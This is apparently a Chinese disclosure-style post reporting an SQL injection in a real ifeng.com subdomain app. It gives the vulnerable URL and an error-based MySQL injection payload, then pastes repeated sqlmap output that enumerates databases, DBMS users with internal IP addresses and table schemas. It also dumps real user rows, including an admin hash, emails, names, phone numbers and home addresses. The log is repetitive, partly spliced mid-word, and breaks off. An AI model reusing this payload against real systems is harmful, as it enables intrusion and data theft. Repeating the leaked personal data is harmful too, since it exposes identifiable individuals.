목차
凤凰网分站SQL注入漏洞_MySQL
凤凰网分站SQL注入漏洞注入地址:http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined
单引号回车后报错,爆路径,于是丢到sqlmap中跑
之后就什么都有了
首先是数据库列表
之后查看是否是dba之后查看用户列表
完完全全的暴露了内网的ip和其他数据库地址
剩下的看代码吧
<code>sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>[32 tables]<br>+-----------------------+<br>| wiki_activation |<br>| wiki_advertisement |<br>| wiki_attachment |<br>| wiki_autosave |<br>| wiki_banned |<br>| wiki_blacklist |<br>| wiki_category |<br>| wiki_channel |<br>| wiki_comment |<br>| wiki_creditdetail |<br>| wiki_doc |<br>| wiki_docreference |<br>| wiki_edition |<br>| wiki_focus |<br>| wiki_friendlink |<br>| wiki_language |<br>| wiki_lock |<br>| wiki_plugin |<br>| wiki_pluginhook |<br>| wiki_pluginvar |<br>| wiki_pms |<br>| wiki_regular |<br>| wiki_regular_relation |<br>| wiki_regulargroup |<br>| wiki_session |<br>| wiki_setting |<br>| wiki_style |<br>| wiki_synonym |<br>| wiki_task |<br>| wiki_user |<br>| wiki_usergroup |<br>| wiki_word |<br>+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[22 columns]<br>+------------+-----------------------+<br>| Column | Type |<br>+------------+-----------------------+<br>| birthday | int(10) unsigned |<br>| checkup | int(10) unsigned |<br>| creates | mediumint(8) unsigned |<br>| credits | int(10) |<br>| edits | mediumint(8) unsigned |<br>| email | char(50) |<br>| gender | tinyint(1) |<br>| groupid | smallint(6) unsigned|<br>| image | varchar(255) |<br>| language | varchar(20) |<br>| lastip | char(15) |<br>| lasttime | int(10) unsigned |<br>| location | varchar(30) |<br>| password | char(32) |<br>| regip | char(15) |<br>| regtime | int(10) unsigned |<br>| signature| text |<br>| style | varchar(20) |<br>| timeoffset | varchar(20) |<br>| uid | mediumint(8) unsigned |<br>| username | char(15) |<br>| views | int(10) unsigned |<br>+------------+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[10 entries]<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| 1 | 4 | <blank> | default | 0 | 59 | <blank> | wuwei@ifeng.com | 0 | 220.181.24.2 | 1 | 1270174931 | 21 | 0 | 1270174967 | <blank>| house_admin | 0 | e10adc3949ba59abbe56e057f20f883e | zh | <blank> | 8 |<br>| 2 | 4 | <blank> | default | 2 | 171 | <blank> | <blank> | 0 | 220.181.67.192 | 1 | 0 | 41 | 1 | 1286971633 | <blank>| 冠缨豺郎 | 0 | <blank> | zh | <blank> | 8 |<br>| 3 | 2 | <blank> | default | 0 | 29 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| zhaoxiaoxiong | 0 | <blank> | zh | <blank> | 8 |<br>| 4 | 4 | <blank> | default | 44 | 825 | <blank> | <blank> | 0 | 220.181.67.192 | 1 | 0 | 264 | 23 | 1287390647 | <blank>| 漫巴 | 0 | <blank> | zh | <blank> | 8 |<br>| 5 | 8 | <blank> | default | 7 | 1140| <blank> | <blank> | 0 | 220.181.24.2 | 1 | 0 | 663 | 124 | 1270429517 | <blank>| 西瓜妹 | 0 | <blank> | zh | <blank> | 8 |<br>| 6 | 2 | <blank> | default | 0 | 29 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| zhuantou | 0 | <blank> | zh | <blank> | 8 |<br>| 7 | 2 | <blank> | default | 0 | 30 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| c100 | 0 | <blank> | zh | <blank> | 8 |<br>| 8 | 8 | <blank> | default | 7 | 1183| <blank> | <blank> | 0 | 220.181.24.2 | 1 | 0 | 794 | 150 | 1270959387 | <blank>| 金鱼77 | 0 | <blank> | zh | <blank> | 8 |<br>| 9 | 2 | <blank> | default | 0 | 31 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| qq15236958@sina | 0 | <blank> | zh | <blank> | 8 |<br>| 10| 7 | <blank> | default | 0 | 793 | <blank> | <blank> | 0 | 220.181.24.2 | 1 | 0 | 533 | 102 | 1270545218 | <blank>| qq15236958 | 0 | <blank> | zh | <blank> | 8 |<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip| checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| 100 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| yangganghong | 0 | <blank>| zh | <blank> | 8 |<br>| 101 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 肖张氏 | 0 | <blank>| zh | <blank> | 8 |<br>| 102 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| hanruikai | 0 | <blank>| zh | <blank> | 8 |<br>| 103 | 2 | <blank> | default | 0 | 7 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| cbgwllcjt | 0 | <blank>| zh | <blank> | 8 |<br>| 104 | 2 | <blank> | default | 0 | 4 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| gk777 | 0 | <blank>| zh | <blank> | 8 |<br>| 105 | 2 | <blank> | default | 0 | 4 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 品酸 | 0 | <blank>| zh | <blank> | 8 |<br>| 106 | 2 | <blank> | default | 0 | 3 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| daiyb | 0 | <blank>| zh | <blank> | 8 |<br>| 107 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 欧阳君山 | 0 | <blank>| zh | <blank> | 8 |<br>| 108 | 2 | <blank> | default | 0 | 3 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 小马不识途 | 0 | <blank>| zh | <blank> | 8 |<br>| 109 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| gxy891029 | 0 | <blank>| zh | <blank> | 8 |<br>| 110 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 晓飞416329 | 0 | <blank>| zh | <blank> | 8 |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>[35 tables]<br>+------------------------+<br>| wiki_activation |<br>| wiki_advertisement |<br>| wiki_attachment |<br>| wiki_autosave |<br>| wiki_banned |<br>| wiki_blacklist |<br>| wiki_category |<br>| wiki_category_20100224 |<br>| wiki_channel |<br>| wiki_comment |<br>| wiki_creditdetail |<br>| wiki_doc |<br>| wiki_doc_20100224_20 |<br>| wiki_doc_temp_copy |<br>| wiki_docreference |<br>| wiki_edition |<br>| wiki_focus |<br>| wiki_friendlink |<br>| wiki_language |<br>| wiki_lock |<br>| wiki_plugin |<br>| wiki_pluginhook |<br>| wiki_pluginvar |<br>| wiki_pms |<br>| wiki_regular |<br>| wiki_regular_relation|<br>| wiki_regulargroup |<br>| wiki_session |<br>| wiki_setting |<br>| wiki_style |<br>| wiki_synonym |<br>| wiki_task |<br>| wiki_user |<br>| wiki_usergroup |<br>| wiki_word |<br>+------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| 100 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 新娘jiujiu | 0 | <blank>| zh | <blank> | 8 |<br>| 101 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 江湖一鸣 | 0 | <blank>| zh | <blank> | 8 |<br>| 102 | 2 | <blank> | default | 0 | 40 | <blank> | <blank> | 0 | 59.175.185.178 | 1 | 0 | 21 | 0 | 1267751010 | <blank>| erxy | 0 | <blank>| zh | <blank> | 8 |<br>| 103 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| fuf | 0 | <blank>| zh | <blank> | 8 |<br>| 104 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 墨侃 | 0 | <blank>| zh | <blank> | 8 |<br>| 105 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| maiky1987 | 0 | <blank>| zh | <blank> | 8 |<br>| 106 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| yantachenzhong | 0 | <blank>| zh | <blank> | 8 |<br>| 107 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| chen0928 | 0 | <blank>| zh | <blank> | 8 |<br>| 108 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 高老庄0560 | 0 | <blank>| zh | <blank> | 8 |<br>| 109 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| 为了国家的80后 | 0 | <blank>| zh | <blank> | 8 |<br>| 110 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank>| bxbglg123 | 0 | <blank>| zh | <blank> | 8 |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>Table: dkjs<br>[3 entries]<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| id| city | name | story | phone | school | is_wap | photo3 | verify | photo2 | photo1 | address | province | submit_time |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| 122 | 南阳 | 李果 | 失业,多次评为优秀教师,模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0 | 4 | yes | 4 | 4 | 河南省邓州市穰东镇前庄村轩寺组 | 河南 | 2010-02-05 16:08:03 |<br>| 123 | <blank> | 晓清 | | 13017329166 | 某学校 | 0 | 4 | yes | 4 | 4 | 湖南 | 湖南 | 2010-02-05 16:14:31 |<br>| 124 | 梧州 | 郭伟民| | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0 | 4 | yes | 4 | 4 | 岑溪市城中路20号 | 广西 | 2010-02-05 16:14:38 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY 